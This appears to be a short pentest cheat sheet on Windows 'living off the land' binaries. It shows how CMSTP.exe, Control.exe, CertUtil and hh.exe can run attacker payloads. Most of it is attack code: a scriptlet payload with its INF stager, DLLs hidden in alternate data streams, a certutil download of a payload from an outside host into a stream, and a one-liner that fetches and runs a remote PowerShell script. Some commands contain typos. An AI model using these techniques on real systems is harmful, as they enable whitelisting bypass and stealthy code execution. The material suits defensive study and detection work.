Lol Bins

Living Off the Lands

CMSTP.exe

• payload cacl.sct

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");		
		]]>
</script>
</registration>
</scriptlet>

• stager cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,C:\\calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

• run

  cmstp.exe /ni s cmstp.inf

Control.exe

• create dll with msfvenom or custom

• create Alternate Data Stream (ADS)

C:\Users\IEUser\Documents>echo "demo" > C:\demo\test.txt

C:\Users\IEUser\Documents>type calc.dll > C:\demo\test.txt:calc.dll

• execute with control.exe

reference

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-1/

CertUtil

• function of the command
  • download , encode ,decode

• download payload and write in data stream

certuil -urlcache -sploit -f http://192.168.1.210/certuil.txt C:\demo\test2.txt:certutil

• payload is simple powershell command

start-process calc.exe

• execute

powershell < C:\demo\test2.txt:certuil

hh.exe

• create help file with the script from nishang

PS C:\Users\IEUser> IEX((iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1")

PS C:\Users\IEUser\Documents> out-chm -Payload "calc" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\IEUser\Documents\doc.chm


Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics


Created c:\Users\IEUser\Documents\doc.chm, 13,422 bytes

• execute with hh.exe

reference https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/